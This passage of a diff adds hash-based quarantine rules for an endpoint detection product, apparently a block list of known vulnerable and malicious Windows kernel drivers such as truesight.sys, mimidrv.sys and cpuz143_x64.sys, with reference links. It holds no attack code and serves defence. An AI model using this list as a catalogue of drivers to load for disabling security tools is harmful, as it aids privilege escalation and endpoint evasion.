+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "668cd0d3-d1aa-5c2c-bd04-2912f66ea7b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146322Z",
+ "creation_date": "2026-03-23T11:45:32.146324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfcbc010432a89714349bd487555cec1ab5299a70f533a16d326a69e15e0c203",
+ "comment": "Malicious Kernel Driver (aka driver_bfcbc010.sys) [https://www.loldrivers.io/drivers/dbfcce10-76a3-44a4-a9b8-d7126152a235/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "669024a2-67cd-54e5-b511-d8e03fe8efa5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611252Z",
+ "creation_date": "2026-03-23T11:45:29.611254Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611260Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55a69f740a77fc07073c3d077d029dfb2dbe4b673171167e7310bd857eb55982",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66b4d0ed-270e-5798-a395-d7ec926c7de5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149727Z",
+ "creation_date": "2026-03-23T11:45:31.149731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24859bbd60d50a2d8d374aa9becbd98184d542a5c78cef21be027895e663aeba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66b5801f-5d2c-5de7-a855-9311cae2e699",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620620Z",
+ "creation_date": "2026-03-23T11:45:29.620622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66b653b9-79b7-5d84-ab2f-6080b7316435",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604319Z",
+ "creation_date": "2026-03-23T11:45:29.604321Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fb474b921371c4679582df8484932b832345693de94e3c4a158638b4d75a19c",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66bc2424-1c5f-5217-b316-f6d66f8b974c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488742Z",
+ "creation_date": "2026-03-23T11:45:31.488744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "069daefa61c2c3cc1a2cc2cef5eff2434b7782ad31a575d0ffdf3f54fd5f54bf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66c6ae36-66da-5240-9a6c-465c9d04263e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155362Z",
+ "creation_date": "2026-03-23T11:45:31.155364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15f15f3c86a787804c532e1a17473b2397b1456109f7b927b0d0f3ba2f1af95b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66e34cf2-0695-58a8-b160-4c397985c0db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499749Z",
+ "creation_date": "2026-03-23T11:45:31.499752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff7dd4ca5a70cb984d5445d754f3fd252d82acd7aee23bc9539b3f09bad49184",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66e3933c-f20e-56e4-8321-55a62c7ce551",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499802Z",
+ "creation_date": "2026-03-23T11:45:31.499805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80de49749d304bf445e1f8f0710b1a2e85580e1ab153194819edeb9c790b6c95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66e658b1-6b53-50cc-a0f1-5c7b68618490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610228Z",
+ "creation_date": "2026-03-23T11:45:29.610230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610235Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7ebf97a50828f00d7e70140aff5ece77c1eb728be0d9bfceccbebd14b958271",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66e8e828-f542-59b6-bbb8-74cef653b951",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818990Z",
+ "creation_date": "2026-03-23T11:45:31.818993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819001Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9912bc91b85aba24ac99e16550ed7002a44a8f935276da02ce0a7c8f0ed828e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66eed7d0-6044-5e52-a1a6-9bb602986e7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823553Z",
+ "creation_date": "2026-03-23T11:45:31.823556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823564Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2969fa0c80f89b7d56ddc48c7095b298e2e2a1d24b8512b401b97506a3ef619c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66febed4-a11a-5228-9284-8ce79761b7cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606960Z",
+ "creation_date": "2026-03-23T11:45:29.606962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17bdeeb4447f0758c3720991d3ed43a405efb49fd2cdbb37f7b5feb349693acb",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66ff1fe5-a896-5598-8962-27958f608e1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979516Z",
+ "creation_date": "2026-03-23T11:45:29.979518Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66ffccf1-4643-56a0-92ef-76af01ce12a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465397Z",
+ "creation_date": "2026-03-23T11:45:30.465400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67070c69-11bb-5b03-8b70-0db3933a6baf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142969Z",
+ "creation_date": "2026-03-23T11:45:32.142971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d253561067550539a9aca8884846432116fac5eee9948f2c5bdce7cf61985b7d",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "670c55f0-9ef5-5344-8354-14ba5b9387c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140800Z",
+ "creation_date": "2026-03-23T11:45:31.140802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81bb50d82e7a8524e86aaa97be12a21d697fdb3232891cbd5c3cf6d559355cfa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6712a352-3166-554e-9201-38b568359ad0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152494Z",
+ "creation_date": "2026-03-23T11:45:31.152497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31b740adf90543537cdcd20dc600cd9741ecaaa0c3b8e886e6b2abdca4e2c8ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6729f487-410e-52b4-9fe3-57b729f979d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821601Z",
+ "creation_date": "2026-03-23T11:45:31.821603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a3ac9361f7af572bc159f0c0abd860012eae7b5cfb2d884d2ad3126217241cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "672af660-b0a3-5472-9a65-cf590cadb0eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606706Z",
+ "creation_date": "2026-03-23T11:45:29.606708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c2be8539dab5df7574557c5946862ad15e44b1659db96b9ec4a8a7ec43636ce",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "672f6010-ae93-585e-bd71-f1e8a6c575e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814040Z",
+ "creation_date": "2026-03-23T11:45:31.814043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "695aaf49d9179944f8aeb9fe09cfe73ee690224a9fb569a81fe42872cbf893ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "673bf240-4878-5a1a-ab0a-64e08550949e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817197Z",
+ "creation_date": "2026-03-23T11:45:30.817199Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a982eed9cbc724d50a9ddf4f74ecbcd67b4fdcd9c2bb1795bc88c2d9caf7506",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "674231a5-0043-5d86-8a1b-fd888e815bce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
